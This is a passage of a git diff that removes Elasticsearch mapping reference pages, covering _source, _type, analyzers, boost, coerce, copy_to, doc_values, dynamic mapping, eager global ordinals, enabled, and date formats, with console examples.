by providing the index level setting <> at index creation. -As the partition size increases, the more evenly distributed the data will become at the -expense of having to search more shards per request. - -When this setting is present, the formula for calculating the shard becomes: - - shard_num = (hash(_routing) + hash(_id) % routing_partition_size) % num_primary_shards - -That is, the `_routing` field is used to calculate a set of shards within the index and then the -`_id` is used to pick a shard within that set. - -To enable this feature, the `index.routing_partition_size` should have a value greater than 1 and -less than `index.number_of_shards`. - -Once enabled, the partitioned index will have the following limitations: - -* Mappings with <> relationships cannot be created within it. -* All mappings within the index must have the `_routing` field marked as required. diff --git a/docs/reference/mapping/fields/source-field.asciidoc b/docs/reference/mapping/fields/source-field.asciidoc deleted file mode 100644 index 43b1fc3b1e4..00000000000 --- a/docs/reference/mapping/fields/source-field.asciidoc +++ /dev/null @@ -1,114 +0,0 @@ -[[mapping-source-field]] -=== `_source` field - -The `_source` field contains the original JSON document body that was passed -at index time. The `_source` field itself is not indexed (and thus is not -searchable), but it is stored so that it can be returned when executing -_fetch_ requests, like <> or <>. - -[[disable-source-field]] -==== Disabling the `_source` field - -Though very handy to have around, the source field does incur storage overhead -within the index. For this reason, it can be disabled as follows: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "_source": { - "enabled": false - } - } -} --------------------------------------------------- - -[WARNING] -.Think before disabling the `_source` field -================================================== - -Users often disable the `_source` field without thinking about the -consequences, and then live to regret it. If the `_source` field isn't -available then a number of features are not supported: - -* The <>, <>, -and <> APIs. - -* On the fly <>. - -* The ability to reindex from one Elasticsearch index to another, either - to change mappings or analysis, or to upgrade an index to a new major - version. - -* The ability to debug queries or aggregations by viewing the original - document used at index time. - -* Potentially in the future, the ability to repair index corruption - automatically. -================================================== - -TIP: If disk space is a concern, rather increase the -<> instead of disabling the `_source`. - -[[include-exclude]] -==== Including / Excluding fields from `_source` - -An expert-only feature is the ability to prune the contents of the `_source` -field after the document has been indexed, but before the `_source` field is -stored. - -WARNING: Removing fields from the `_source` has similar downsides to disabling -`_source`, especially the fact that you cannot reindex documents from one -Elasticsearch index to another. Consider using -<> instead. - -The `includes`/`excludes` parameters (which also accept wildcards) can be used -as follows: - -[source,console] --------------------------------------------------- -PUT logs -{ - "mappings": { - "_source": { - "includes": [ - "*.count", - "meta.*" - ], - "excludes": [ - "meta.description", - "meta.other.*" - ] - } - } -} - -PUT logs/_doc/1 -{ - "requests": { - "count": 10, - "foo": "bar" <1> - }, - "meta": { - "name": "Some metric", - "description": "Some metric description", <1> - "other": { - "foo": "one", <1> - "baz": "two" <1> - } - } -} - -GET logs/_search -{ - "query": { - "match": { - "meta.other.foo": "one" <2> - } - } -} --------------------------------------------------- - -<1> These fields will be removed from the stored `_source` field. -<2> We can still search on this field, even though it is not in the stored `_source`. diff --git a/docs/reference/mapping/fields/type-field.asciidoc b/docs/reference/mapping/fields/type-field.asciidoc deleted file mode 100644 index 2b99e2ac1dc..00000000000 --- a/docs/reference/mapping/fields/type-field.asciidoc +++ /dev/null @@ -1,60 +0,0 @@ -[[mapping-type-field]] -=== `_type` field - -deprecated[6.0.0,See <>] - -Each document indexed is associated with a <> and -an <>. The `_type` field is indexed in order to make -searching by type name fast. - -The value of the `_type` field is accessible in queries, aggregations, -scripts, and when sorting: - -[source,console] --------------------------- -# Example documents - -PUT my-index-000001/_doc/1?refresh=true -{ - "text": "Document with type 'doc'" -} - -GET my-index-000001/_search -{ - "query": { - "term": { - "_type": "_doc" <1> - } - }, - "aggs": { - "types": { - "terms": { - "field": "_type", <2> - "size": 10 - } - } - }, - "sort": [ - { - "_type": { <3> - "order": "desc" - } - } - ], - "script_fields": { - "type": { - "script": { - "lang": "painless", - "source": "doc['_type']" <4> - } - } - } -} - --------------------------- - -<1> Querying on the `_type` field -<2> Aggregating on the `_type` field -<3> Sorting on the `_type` field -<4> Accessing the `_type` field in scripts - diff --git a/docs/reference/mapping/params.asciidoc b/docs/reference/mapping/params.asciidoc deleted file mode 100644 index cbf21f55f8d..00000000000 --- a/docs/reference/mapping/params.asciidoc +++ /dev/null @@ -1,89 +0,0 @@ -[[mapping-params]] -== Mapping parameters - -The following pages provide detailed explanations of the various mapping -parameters that are used by <>: - - -The following mapping parameters are common to some or all field data types: - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - - -include::params/analyzer.asciidoc[] - -include::params/boost.asciidoc[] - -include::params/coerce.asciidoc[] - -include::params/copy-to.asciidoc[] - -include::params/doc-values.asciidoc[] - -include::params/dynamic.asciidoc[] - -include::params/eager-global-ordinals.asciidoc[] - -include::params/enabled.asciidoc[] - -include::params/format.asciidoc[] - -include::params/ignore-above.asciidoc[] - -include::params/ignore-malformed.asciidoc[] - -include::params/index.asciidoc[] - -include::params/index-options.asciidoc[] - -include::params/index-phrases.asciidoc[] - -include::params/index-prefixes.asciidoc[] - -include::params/meta.asciidoc[] - -include::params/multi-fields.asciidoc[] - -include::params/normalizer.asciidoc[] - -include::params/norms.asciidoc[] - -include::params/null-value.asciidoc[] - -include::params/position-increment-gap.asciidoc[] - -include::params/properties.asciidoc[] - -include::params/search-analyzer.asciidoc[] - -include::params/similarity.asciidoc[] - -include::params/store.asciidoc[] - -include::params/term-vector.asciidoc[] diff --git a/docs/reference/mapping/params/analyzer.asciidoc b/docs/reference/mapping/params/analyzer.asciidoc deleted file mode 100644 index 4c5d7cda733..00000000000 --- a/docs/reference/mapping/params/analyzer.asciidoc +++ /dev/null @@ -1,107 +0,0 @@ -[[analyzer]] -=== `analyzer` - -[IMPORTANT] -==== -Only <> fields support the `analyzer` mapping parameter. -==== - -The `analyzer` parameter specifies the <> used for -<> when indexing or searching a `text` field. - -Unless overridden with the <> mapping -parameter, this analyzer is used for both <>. See <>. - -[TIP] -==== -We recommend testing analyzers before using them in production. See -<>. -==== - -[[search-quote-analyzer]] -==== `search_quote_analyzer` - -The `search_quote_analyzer` setting allows you to specify an analyzer for phrases, this is particularly useful when dealing with disabling -stop words for phrase queries. - -To disable stop words for phrases a field utilising three analyzer settings will be required: - -1. An `analyzer` setting for indexing all terms including stop words -2. A `search_analyzer` setting for non-phrase queries that will remove stop words -3. A `search_quote_analyzer` setting for phrase queries that will not remove stop words - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "settings":{ - "analysis":{ - "analyzer":{ - "my_analyzer":{ <1> - "type":"custom", - "tokenizer":"standard", - "filter":[ - "lowercase" - ] - }, - "my_stop_analyzer":{ <2> - "type":"custom", - "tokenizer":"standard", - "filter":[ - "lowercase", - "english_stop" - ] - } - }, - "filter":{ - "english_stop":{ - "type":"stop", - "stopwords":"_english_" - } - } - } - }, - "mappings":{ - "properties":{ - "title": { - "type":"text", - "analyzer":"my_analyzer", <3> - "search_analyzer":"my_stop_analyzer", <4> - "search_quote_analyzer":"my_analyzer" <5> - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "title":"The Quick Brown Fox" -} - -PUT my-index-000001/_doc/2 -{ - "title":"A Quick Brown Fox" -} - -GET my-index-000001/_search -{ - "query":{ - "query_string":{ - "query":"\"the quick brown fox\"" <6> - } - } -} --------------------------------------------------- - -<1> `my_analyzer` analyzer which tokens all terms including stop words -<2> `my_stop_analyzer` analyzer which removes stop words -<3> `analyzer` setting that points to the `my_analyzer` analyzer which will be used at index time -<4> `search_analyzer` setting that points to the `my_stop_analyzer` and removes stop words for non-phrase queries -<5> `search_quote_analyzer` setting that points to the `my_analyzer` analyzer and ensures that stop words are not removed from phrase queries -<6> Since the query is wrapped in quotes it is detected as a phrase query therefore the `search_quote_analyzer` kicks in and ensures the stop words -are not removed from the query. The `my_analyzer` analyzer will then return the following tokens [`the`, `quick`, `brown`, `fox`] which will match one -of the documents. Meanwhile term queries will be analyzed with the `my_stop_analyzer` analyzer which will filter out stop words. So a search for either -`The quick brown fox` or `A quick brown fox` will return both documents since both documents contain the following tokens [`quick`, `brown`, `fox`]. -Without the `search_quote_analyzer` it would not be possible to do exact matches for phrase queries as the stop words from phrase queries would be -removed resulting in both documents matching. diff --git a/docs/reference/mapping/params/boost.asciidoc b/docs/reference/mapping/params/boost.asciidoc deleted file mode 100644 index 1cfd62d016e..00000000000 --- a/docs/reference/mapping/params/boost.asciidoc +++ /dev/null @@ -1,82 +0,0 @@ -[[mapping-boost]] -=== `boost` - -Individual fields can be _boosted_ automatically -- count more towards the relevance score --- at query time, with the `boost` parameter as follows: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "title": { - "type": "text", - "boost": 2 <1> - }, - "content": { - "type": "text" - } - } - } -} --------------------------------------------------- -// TEST[warning:Parameter [boost] on field [title] is deprecated and will be removed in 8.0] - -<1> Matches on the `title` field will have twice the weight as those on the - `content` field, which has the default `boost` of `1.0`. - -NOTE: The boost is applied only for term queries (prefix, range and fuzzy queries are not _boosted_). - -You can achieve the same effect by using the boost parameter directly in the query, for instance the following query (with field time boost): - -[source,console] --------------------------------------------------- -POST _search -{ - "query": { - "match": { - "title": { - "query": "quick brown fox" - } - } - } -} --------------------------------------------------- - -is equivalent to: - -[source,console] --------------------------------------------------- -POST _search -{ - "query": { - "match": { - "title": { - "query": "quick brown fox", - "boost": 2 - } - } - } -} --------------------------------------------------- - - -deprecated[5.0.0, "Index time boost is deprecated. Instead, the field mapping boost is applied at query time. For indices created before 5.0.0, the boost will still be applied at index time."] -[WARNING] -.Why index time boosting is a bad idea -================================================== - -We advise against using index time boosting for the following reasons: - -* You cannot change index-time `boost` values without reindexing all of your - documents. - -* Every query supports query-time boosting which achieves the same effect. The - difference is that you can tweak the `boost` value without having to reindex. - -* Index-time boosts are stored as part of the <>, which is only one - byte. This reduces the resolution of the field length normalization factor - which can lead to lower quality relevance calculations. - -================================================== diff --git a/docs/reference/mapping/params/coerce.asciidoc b/docs/reference/mapping/params/coerce.asciidoc deleted file mode 100644 index 805dd33bcf4..00000000000 --- a/docs/reference/mapping/params/coerce.asciidoc +++ /dev/null @@ -1,88 +0,0 @@ -[[coerce]] -=== `coerce` - -Data is not always clean. Depending on how it is produced a number might be -rendered in the JSON body as a true JSON number, e.g. `5`, but it might also -be rendered as a string, e.g. `"5"`. Alternatively, a number that should be -an integer might instead be rendered as a floating point, e.g. `5.0`, or even -`"5.0"`. - -Coercion attempts to clean up dirty values to fit the data type of a field. -For instance: - -* Strings will be coerced to numbers. -* Floating points will be truncated for integer values. - -For instance: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "number_one": { - "type": "integer" - }, - "number_two": { - "type": "integer", - "coerce": false - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "number_one": "10" <1> -} - -PUT my-index-000001/_doc/2 -{ - "number_two": "10" <2> -} --------------------------------------------------- -// TEST[catch:bad_request] - -<1> The `number_one` field will contain the integer `10`. -<2> This document will be rejected because coercion is disabled. - -TIP: The `coerce` setting value can be updated on existing fields -using the <>. - -[[coerce-setting]] -==== Index-level default - -The `index.mapping.coerce` setting can be set on the index level to disable -coercion globally across all mapping types: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "settings": { - "index.mapping.coerce": false - }, - "mappings": { - "properties": { - "number_one": { - "type": "integer", - "coerce": true - }, - "number_two": { - "type": "integer" - } - } - } -} - -PUT my-index-000001/_doc/1 -{ "number_one": "10" } <1> - -PUT my-index-000001/_doc/2 -{ "number_two": "10" } <2> --------------------------------------------------- -// TEST[catch:bad_request] - -<1> The `number_one` field overrides the index level setting to enable coercion. -<2> This document will be rejected because the `number_two` field inherits the index-level coercion setting. diff --git a/docs/reference/mapping/params/copy-to.asciidoc b/docs/reference/mapping/params/copy-to.asciidoc deleted file mode 100644 index cc5c811ccf3..00000000000 --- a/docs/reference/mapping/params/copy-to.asciidoc +++ /dev/null @@ -1,70 +0,0 @@ -[[copy-to]] -=== `copy_to` - -The `copy_to` parameter allows you to copy the values of multiple -fields into a group field, which can then be queried as a single -field. - -TIP: If you often search multiple fields, you can improve search speeds by using -`copy_to` to search fewer fields. See <>. - -For example, the `first_name` and `last_name` fields can be copied to -the `full_name` field as follows: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "first_name": { - "type": "text", - "copy_to": "full_name" <1> - }, - "last_name": { - "type": "text", - "copy_to": "full_name" <1> - }, - "full_name": { - "type": "text" - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "first_name": "John", - "last_name": "Smith" -} - -GET my-index-000001/_search -{ - "query": { - "match": { - "full_name": { <2> - "query": "John Smith", - "operator": "and" - } - } - } -} - --------------------------------------------------- - -<1> The values of the `first_name` and `last_name` fields are copied to the - `full_name` field. - -<2> The `first_name` and `last_name` fields can still be queried for the - first name and last name respectively, but the `full_name` field can be - queried for both first and last names. - -Some important points: - -* It is the field _value_ which is copied, not the terms (which result from the analysis process). -* The original <> field will not be modified to show the copied values. -* The same value can be copied to multiple fields, with `"copy_to": [ "field_1", "field_2" ]` -* You cannot copy recursively via intermediary fields such as a `copy_to` on -`field_1` to `field_2` and `copy_to` on `field_2` to `field_3` expecting -indexing into `field_1` will eventuate in `field_3`, instead use copy_to -directly to multiple fields from the originating field. \ No newline at end of file diff --git a/docs/reference/mapping/params/doc-values.asciidoc b/docs/reference/mapping/params/doc-values.asciidoc deleted file mode 100644 index e065537daa4..00000000000 --- a/docs/reference/mapping/params/doc-values.asciidoc +++ /dev/null @@ -1,46 +0,0 @@ -[[doc-values]] -=== `doc_values` - -Most fields are <> by default, which makes them -searchable. The inverted index allows queries to look up the search term in -unique sorted list of terms, and from that immediately have access to the list -of documents that contain the term. - -Sorting, aggregations, and access to field values in scripts requires a -different data access pattern. Instead of looking up the term and finding -documents, we need to be able to look up the document and find the terms that -it has in a field. - -Doc values are the on-disk data structure, built at document index time, which -makes this data access pattern possible. They store the same values as the -`_source` but in a column-oriented fashion that is way more efficient for -sorting and aggregations. Doc values are supported on almost all field types, -with the __notable exception of `text` and `annotated_text` fields__. - -All fields which support doc values have them enabled by default. If you are -sure that you don't need to sort or aggregate on a field, or access the field -value from a script, you can disable doc values in order to save disk space: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "status_code": { <1> - "type": "keyword" - }, - "session_id": { <2> - "type": "keyword", - "doc_values": false - } - } - } -} --------------------------------------------------- - -<1> The `status_code` field has `doc_values` enabled by default. -<2> The `session_id` has `doc_values` disabled, but can still be queried. - -NOTE: You cannot disable doc values for <> -fields. diff --git a/docs/reference/mapping/params/dynamic.asciidoc b/docs/reference/mapping/params/dynamic.asciidoc deleted file mode 100644 index 2eddb010d20..00000000000 --- a/docs/reference/mapping/params/dynamic.asciidoc +++ /dev/null @@ -1,87 +0,0 @@ -[[dynamic]] -=== `dynamic` - -By default, fields can be added _dynamically_ to a document, or to -<> within a document, just by indexing a document -containing the new field. For instance: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1 <1> -{ - "username": "johnsmith", - "name": { - "first": "John", - "last": "Smith" - } -} - -GET my-index-000001/_mapping <2> - -PUT my-index-000001/_doc/2 <3> -{ - "username": "marywhite", - "email": "mary@white.com", - "name": { - "first": "Mary", - "middle": "Alice", - "last": "White" - } -} - -GET my-index-000001/_mapping <4> --------------------------------------------------- - -<1> This document introduces the string field `username`, the object field - `name`, and two string fields under the `name` object which can be - referred to as `name.first` and `name.last`. -<2> Check the mapping to verify the above. -<3> This document adds two string fields: `email` and `name.middle`. -<4> Check the mapping to verify the changes. - -The details of how new fields are detected and added to the mapping is explained in <>. - -The `dynamic` setting controls whether new fields can be added dynamically or -not. It accepts three settings: - -[horizontal] -`true`:: Newly detected fields are added to the mapping. (default) -`false`:: Newly detected fields are ignored. These fields will not be indexed so will not be searchable - but will still appear in the `_source` field of returned hits. These fields will not be added - to the mapping, new fields must be added explicitly. -`strict`:: If new fields are detected, an exception is thrown and the document is rejected. New fields - must be explicitly added to the mapping. - -The `dynamic` setting may be set at the mapping type level, and on each -<>. Inner objects inherit the setting from their parent -object or from the mapping type. For instance: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "dynamic": false, <1> - "properties": { - "user": { <2> - "properties": { - "name": { - "type": "text" - }, - "social_networks": { <3> - "dynamic": true, - "properties": {} - } - } - } - } - } -} --------------------------------------------------- - -<1> Dynamic mapping is disabled at the type level, so no new top-level fields will be added dynamically. -<2> The `user` object inherits the type-level setting. -<3> The `user.social_networks` object enables dynamic mapping, so new fields may be added to this inner object. - -TIP: The `dynamic` setting can be updated on existing fields -using the <>. diff --git a/docs/reference/mapping/params/eager-global-ordinals.asciidoc b/docs/reference/mapping/params/eager-global-ordinals.asciidoc deleted file mode 100644 index 76f2f416564..00000000000 --- a/docs/reference/mapping/params/eager-global-ordinals.asciidoc +++ /dev/null @@ -1,116 +0,0 @@ -[[eager-global-ordinals]] -=== `eager_global_ordinals` - -==== What are global ordinals? - -To support aggregations and other operations that require looking up field -values on a per-document basis, Elasticsearch uses a data structure called -<>. Term-based field types such as `keyword` store -their doc values using an ordinal mapping for a more compact representation. -This mapping works by assigning each term an incremental integer or 'ordinal' -based on its lexicographic order. The field's doc values store only the -ordinals for each document instead of the original terms, with a separate -lookup structure to convert between ordinals and terms. - -When used during aggregations, ordinals can greatly improve performance. As an -example, the `terms` aggregation relies only on ordinals to collect documents -into buckets at the shard-level, then converts the ordinals back to their -original term values when combining results across shards. - -Each index segment defines its own ordinal mapping, but aggregations collect -data across an entire shard. So to be able to use ordinals for shard-level -operations like aggregations, Elasticsearch creates a unified mapping called -'global ordinals'. The global ordinal mapping is built on top of segment -ordinals, and works by maintaining a map from global ordinal to the local -ordinal for each segment. - -Global ordinals are used if a search contains any of the following components: - -* Certain bucket aggregations on `keyword`, `ip`, and `flattened` fields. This -includes `terms` aggregations as mentioned above, as well as `composite`, -`diversified_sampler`, and `significant_terms`. -* Bucket aggregations on `text` fields that require <> -to be enabled. -* Operations on parent and child documents from a `join` field, including -`has_child` queries and `parent` aggregations. - -NOTE: The global ordinal mapping uses heap memory as part of the -<>. Aggregations on high cardinality fields -can use a lot of memory and trigger the <>. - -==== Loading global ordinals - -The global ordinal mapping must be built before ordinals can be used during a -search. By default, the mapping is loaded during search on the first time that -global ordinals are needed. This is is the right approach if you are optimizing -for indexing speed, but if search performance is a priority, it's recommended -to eagerly load global ordinals eagerly on fields that will be used in -aggregations: - -[source,console] ------------- -PUT my-index-000001/_mapping -{ - "properties": { - "tags": { - "type": "keyword", - "eager_global_ordinals": true - } - } -} ------------- -// TEST[s/^/PUT my-index-000001\n/] - -When `eager_global_ordinals` is enabled, global ordinals are built when a shard -is <> -- Elasticsearch always loads them before -exposing changes to the content of the index. This shifts the cost of building -global ordinals from search to index-time. Elasticsearch will also eagerly -build global ordinals when creating a new copy of a shard, as can occur when -increasing the number of replicas or relocating a shard onto a new node. - -Eager loading can be disabled at any time by updating the `eager_global_ordinals` setting: - -[source,console] ------------- -PUT my-index-000001/_mapping -{ - "properties": { - "tags": { - "type": "keyword", - "eager_global_ordinals": false - } - } -} ------------- -// TEST[continued] - -IMPORTANT: On a <>, global ordinals are discarded -after each search and rebuilt again when they're requested. This means that -`eager_global_ordinals` should not be used on frozen indices: it would -cause global ordinals to be reloaded on every search. Instead, the index should -be force-merged to a single segment before being frozen. This avoids building -global ordinals altogether (more details can be found in the next section). - -==== Avoiding global ordinal loading - -Usually, global ordinals do not present a large overhead in terms of their -loading time and memory usage. However, loading global ordinals can be -expensive on indices with large shards, or if the fields contain a large -number of unique term values. Because global ordinals provide a unified mapping -for all segments on the shard, they also need to be rebuilt entirely when a new -segment becomes visible. - -In some cases it is possible to avoid global ordinal loading altogether: - -* The `terms`, `sampler`, and `significant_terms` aggregations support a -parameter -<> -that helps control how buckets are collected. It defaults to `global_ordinals`, -but can be set to `map` to instead use the term values directly. -* If a shard has been <> down to a single -segment, then its segment ordinals are already 'global' to the shard. In this -case, Elasticsearch does not need to build a global ordinal mapping and there -is no additional overhead from using global ordinals. Note that for performance -reasons you should only force-merge an index to which you will never write to -again. diff --git a/docs/reference/mapping/params/enabled.asciidoc b/docs/reference/mapping/params/enabled.asciidoc deleted file mode 100644 index cd8555d952a..00000000000 --- a/docs/reference/mapping/params/enabled.asciidoc +++ /dev/null @@ -1,118 +0,0 @@ -[[enabled]] -=== `enabled` - -Elasticsearch tries to index all of the fields you give it, but sometimes you -want to just store the field without indexing it. For instance, imagine that -you are using Elasticsearch as a web session store. You may want to index the -session ID and last update time, but you don't need to query or run -aggregations on the session data itself. - -The `enabled` setting, which can be applied only to the top-level mapping -definition and to <> fields, causes Elasticsearch to skip -parsing of the contents of the field entirely. The JSON can still be retrieved -from the <> field, but it is not searchable or -stored in any other way: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "user_id": { - "type": "keyword" - }, - "last_updated": { - "type": "date" - }, - "session_data": { <1> - "type": "object", - "enabled": false - } - } - } -} - -PUT my-index-000001/_doc/session_1 -{ - "user_id": "kimchy", - "session_data": { <2> - "arbitrary_object": { - "some_array": [ "foo", "bar", { "baz": 2 } ] - } - }, - "last_updated": "2015-12-06T18:20:22" -} - -PUT my-index-000001/_doc/session_2 -{ - "user_id": "jpountz", - "session_data": "none", <3> - "last_updated": "2015-12-06T18:22:13" -} --------------------------------------------------- - -<1> The `session_data` field is disabled. -<2> Any arbitrary data can be passed to the `session_data` field as it will be entirely ignored. -<3> The `session_data` will also ignore values that are not JSON objects. - -The entire mapping may be disabled as well, in which case the document is -stored in the <> field, which means it can be -retrieved, but none of its contents are indexed in any way: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "enabled": false <1> - } -} - -PUT my-index-000001/_doc/session_1 -{ - "user_id": "kimchy", - "session_data": { - "arbitrary_object": { - "some_array": [ "foo", "bar", { "baz": 2 } ] - } - }, - "last_updated": "2015-12-06T18:20:22" -} - -GET my-index-000001/_doc/session_1 <2> - -GET my-index-000001/_mapping <3> --------------------------------------------------- - -<1> The entire mapping is disabled. -<2> The document can be retrieved. -<3> Checking the mapping reveals that no fields have been added. - -The `enabled` setting for existing fields and the top-level mapping -definition cannot be updated. - -Note that because Elasticsearch completely skips parsing the field -contents, it is possible to add non-object data to a disabled field: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "session_data": { - "type": "object", - "enabled": false - } - } - } -} - -PUT my-index-000001/_doc/session_1 -{ - "session_data": "foo bar" <1> -} --------------------------------------------------- - -<1> The document is added successfully, even though `session_data` contains non-object data. \ No newline at end of file diff --git a/docs/reference/mapping/params/format.asciidoc b/docs/reference/mapping/params/format.asciidoc deleted file mode 100644 index df66a3b64f9..00000000000 --- a/docs/reference/mapping/params/format.asciidoc +++ /dev/null @@ -1,291 +0,0 @@ -[[mapping-date-format]] -=== `format` - -In JSON documents, dates are represented as strings. Elasticsearch uses a set -of preconfigured formats to recognize and parse these strings into a long -value representing _milliseconds-since-the-epoch_ in UTC. - -Besides the <>, your own -<> can be specified using the familiar -`yyyy/MM/dd` syntax: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "date": { - "type": "date", - "format": "yyyy-MM-dd" - } - } - } -} --------------------------------------------------- - -Many APIs which support date values also support <> -expressions, such as `now-1m/d` -- the current time, minus one month, rounded -down to the nearest day. - -[[custom-date-formats]] -==== Custom date formats - -Completely customizable date formats are supported. The syntax for these is explained -https://docs.oracle.com/javase/8/docs/api/java/time/format/DateTimeFormatter.html[DateTimeFormatter docs]. - -[[built-in-date-formats]] -==== Built In Formats - -Most of the below formats have a `strict` companion format, which means that -year, month and day parts of the week must use respectively 4, 2 and 2 digits -exactly, potentially prepending zeros. For instance a date like `5/11/1` would -be considered invalid and would need to be rewritten to `2005/11/01` to be -accepted by the date parser. - -To use them, you need to prepend `strict_` to the name of the date format, for -instance `strict_date_optional_time` instead of `date_optional_time`. - -These strict date formats are especially useful when -<> in order to make sure to -not accidentally map irrelevant strings as dates. - -The following tables lists all the defaults ISO formats supported: - -`epoch_millis`:: - - A formatter for the number of milliseconds since the epoch. Note, that - this timestamp is subject to the limits of a Java `Long.MIN_VALUE` and - `Long.MAX_VALUE`. - -`epoch_second`:: - - A formatter for the number of seconds since the epoch. Note, that this - timestamp is subject to the limits of a Java `Long.MIN_VALUE` and `Long. - MAX_VALUE` divided by 1000 (the number of milliseconds in a second). - -[[strict-date-time]]`date_optional_time` or `strict_date_optional_time`:: - - A generic ISO datetime parser, where the date must include the year at a minimum, and the time - (separated by `T`), is optional. - Examples: `yyyy-MM-dd'T'HH:mm:ss.SSSZ` or `yyyy-MM-dd`. - -[[strict-date-time-nanos]]`strict_date_optional_time_nanos`:: - - A generic ISO datetime parser, where the date must include the year at a minimum, and the time - (separated by `T`), is optional. The fraction of a second - part has a nanosecond resolution. - Examples: `yyyy-MM-dd'T'HH:mm:ss.SSSSSSZ` or `yyyy-MM-dd`. - -`basic_date`:: - - A basic formatter for a full date as four digit year, two digit month of - year, and two digit day of month: `yyyyMMdd`. - -`basic_date_time`:: - - A basic formatter that combines a basic date and time, separated by a 'T': - `yyyyMMdd'T'HHmmss.SSSZ`. - -`basic_date_time_no_millis`:: - - A basic formatter that combines a basic date and time without millis, - separated by a 'T': `yyyyMMdd'T'HHmmssZ`. - -`basic_ordinal_date`:: - - A formatter for a full ordinal date, using a four digit year and three - digit dayOfYear: `yyyyDDD`. - -`basic_ordinal_date_time`:: - - A formatter for a full ordinal date and time, using a four digit year and - three digit dayOfYear: `yyyyDDD'T'HHmmss.SSSZ`. - -`basic_ordinal_date_time_no_millis`:: - - A formatter for a full ordinal date and time without millis, using a four - digit year and three digit dayOfYear: `yyyyDDD'T'HHmmssZ`. - -`basic_time`:: - - A basic formatter for a two digit hour of day, two digit minute of hour, - two digit second of minute, three digit millis, and time zone offset: - `HHmmss.SSSZ`. - -`basic_time_no_millis`:: - - A basic formatter for a two digit hour of day, two digit minute of hour, - two digit second of minute, and time zone offset: `HHmmssZ`. - -`basic_t_time`:: - - A basic formatter for a two digit hour of day, two digit minute of hour, - two digit second of minute, three digit millis, and time zone off set - prefixed by 'T': `'T'HHmmss.SSSZ`. - -`basic_t_time_no_millis`:: - - A basic formatter for a two digit hour of day, two digit minute of hour, - two digit second of minute, and time zone offset prefixed by 'T': - `'T'HHmmssZ`. - -`basic_week_date` or `strict_basic_week_date`:: - - A basic formatter for a full date as four digit weekyear, two digit week - of weekyear, and one digit day of week: `xxxx'W'wwe`. - -`basic_week_date_time` or `strict_basic_week_date_time`:: - - A basic formatter that combines a basic weekyear date and time, separated - by a 'T': `xxxx'W'wwe'T'HHmmss.SSSZ`. - -`basic_week_date_time_no_millis` or `strict_basic_week_date_time_no_millis`:: - - A basic formatter that combines a basic weekyear date and time without - millis, separated by a 'T': `xxxx'W'wwe'T'HHmmssZ`. - -`date` or `strict_date`:: - - A formatter for a full date as four digit year, two digit month of year, - and two digit day of month: `yyyy-MM-dd`. - -`date_hour` or `strict_date_hour`:: - - A formatter that combines a full date and two digit hour of day: - `yyyy-MM-dd'T'HH`. - -`date_hour_minute` or `strict_date_hour_minute`:: - - A formatter that combines a full date, two digit hour of day, and two - digit minute of hour: `yyyy-MM-dd'T'HH:mm`. - -`date_hour_minute_second` or `strict_date_hour_minute_second`:: - - A formatter that combines a full date, two digit hour of day, two digit - minute of hour, and two digit second of minute: `yyyy-MM-dd'T'HH:mm:ss`. - -`date_hour_minute_second_fraction` or `strict_date_hour_minute_second_fraction`:: - - A formatter that combines a full date, two digit hour of day, two digit - minute of hour, two digit second of minute, and three digit fraction of - second: `yyyy-MM-dd'T'HH:mm:ss.SSS`. - -`date_hour_minute_second_millis` or `strict_date_hour_minute_second_millis`:: - - A formatter that combines a full date, two digit hour of day, two digit - minute of hour, two digit second of minute, and three digit fraction of - second: `yyyy-MM-dd'T'HH:mm:ss.SSS`. - -`date_time` or `strict_date_time`:: - - A formatter that combines a full date and time, separated by a 'T': - `yyyy-MM-dd'T'HH:mm:ss.SSSZZ`. - -`date_time_no_millis` or `strict_date_time_no_millis`:: - - A formatter that combines a full date and time without millis, separated - by a 'T': `yyyy-MM-dd'T'HH:mm:ssZZ`. - -`hour` or `strict_hour`:: - - A formatter for a two digit hour of day: `HH` - -`hour_minute` or `strict_hour_minute`:: - - A formatter for a two digit hour of day and two digit minute of hour: - `HH:mm`. - -`hour_minute_second` or `strict_hour_minute_second`:: - - A formatter for a two digit hour of day, two digit minute of hour, and two - digit second of minute: `HH:mm:ss`. - -`hour_minute_second_fraction` or `strict_hour_minute_second_fraction`:: - - A formatter for a two digit hour of day, two digit minute of hour, two - digit second of minute, and three digit fraction of second: `HH:mm:ss.SSS`. - -`hour_minute_second_millis` or `strict_hour_minute_second_millis`:: - - A formatter for a two digit hour of day, two digit minute of hour, two - digit second of minute, and three digit fraction of second: `HH:mm:ss.SSS`. - -`ordinal_date` or `strict_ordinal_date`:: - - A formatter for a full ordinal date, using a four digit year and three - digit dayOfYear: `yyyy-DDD`. - -`ordinal_date_time` or `strict_ordinal_date_time`:: - - A formatter for a full ordinal date and time, using a four digit year and - three digit dayOfYear: `yyyy-DDD'T'HH:mm:ss.SSSZZ`. - -`ordinal_date_time_no_millis` or `strict_ordinal_date_time_no_millis`:: - - A formatter for a full ordinal date and time without millis, using a four - digit year and three digit dayOfYear: `yyyy-DDD'T'HH:mm:ssZZ`. - -`time` or `strict_time`:: - - A formatter for a two digit hour of day, two digit minute of hour, two - digit second of minute, three digit fraction of second, and time zone - offset: `HH:mm:ss.SSSZZ`. - -`time_no_millis` or `strict_time_no_millis`:: - - A 